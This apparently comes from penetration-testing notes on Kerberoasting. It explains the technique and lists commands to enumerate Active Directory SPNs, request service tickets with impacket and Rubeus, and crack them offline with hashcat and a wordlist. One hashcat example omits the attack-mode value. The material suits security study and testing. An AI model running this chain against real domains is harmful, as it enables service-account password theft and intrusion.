Kerberoasting (TGS-REP roasting)

https://www.techcrafters.com/portal/en/kb/articles/how-to-list-all-spns-in-a-domain-using-powershell#2__Querying_SPNswww.techcrafters.com

What Is A Kerberoasting Attack? | IBMwww.ibm.com

Get-ADServiceAccount (ActiveDirectory)MicrosoftLearn

What is Kerberoasting?

Kerberoasting (also known as TGS-REP roasting) relies on the fact that a Ticket Granting Service (TGS) created for a service will be encrypted with a hash derived from the password of the associated service account. This allows an attacker to perform a dictionary attack to potentially crack the passwords of service accounts linked to services defined by the Service Principal Names (SPNs).

TGS-REP refers to the Kerberos ticket-granting service (TGS) response message, where the KDC validates the TGT, and if valid, responds with a service ticket (TGS) encrypted with the target service account's key.

(1) Retrieve a list of SPNs in the network

Get-ADUser cmdlet

PS> Get-ADUser -Properties ServicePrincipalNames -Filter * | Select Name,ServicePrincipalNames

# more specifically
# (1)
PS> Get-ADUser -Properties ServicePrincipalNames -Filter 'ServicePrincipalNames -like "*"' | Select Name,ServicePrincipalNames

# (2)
PS> Get-ADUser -Properties ServicePrincipalNames -LDAPFilter "(servicePrincipalName=*)" | Select Name,ServicePrincipalNames

Impacket-scripts: GetUserSPNs

$ impacket-GetUserSPNs -dc-ip <DOMAIN_CONTROLLER> <TARGET>

<TARGET>: The domain user account to authenticate to the KDC with
- By default, all domain users can read the servicePrinicpalName attribute (required by the script)
- Thus, as long as a valid user account is provided, it will not affect the results of the script

(2) Retrieve the TGS for the SPNs we have found

impacket-GetUserSPNs with the -request-user flag

$ impacket-GetUserSPNs -dc-ip <DOMAIN_CONTROLLER> <TARGET> -request-user <SERVICE_USER>

-request-user: Requests TGS for the SPN associated to the service user specified (just the username, no domain needed)

Rubeus.exe

C:\> Rubeus.exe kerberoast /spn:<SPN> /ticket:<EXISTING_TGT> 
C:\> Rubeus.exe kerberoast /user:<USERNAME> /ticket:EXISTING_TGT

/ticket: Specifies the TGT to use when requesting the service tickets
/spn: Roasts just the specified SPN
/user: Roasts just the specified user

Other useful flags

a. /outfile:FILE: outputs roasted hashes to the specified file, one per line

b. /simple: roasted hashes will be output to the console, one per line

Combined command

Or, we can directly enumerate the SPNs and request for the associated TGS all in one command:

C:\> Rubeus.exe kerberoast

(3) Perform dictionary attack on the obtained TGS

$ hashcat -a 0 -m <hash_mode> <path_to_spn_hash> <wordlist>
# eg. 
$ echo xxx > spn.hash 
$ hashcat -a -m <hash_mode> spn.hash /usr/share/wordlist/rockyou.txt

-a: Attack mode
- -a 0: Dictionary attack
-m : Hash mode
- -m 13100: either one of 13100, 19600, 19700 (depending on the encryption type of the hashes obtained)

PreviousExploiting domain trusts NextAS-REP roasting

Last updated 4 months ago

hashtagWhat is Kerberoasting?

hashtag(1) Retrieve a list of SPNs in the network

hashtag(2) Retrieve the TGS for the SPNs we have found

hashtag(3) Perform dictionary attack on the obtained TGS

What is Kerberoasting?

(1) Retrieve a list of SPNs in the network

(2) Retrieve the TGS for the SPNs we have found

(3) Perform dictionary attack on the obtained TGS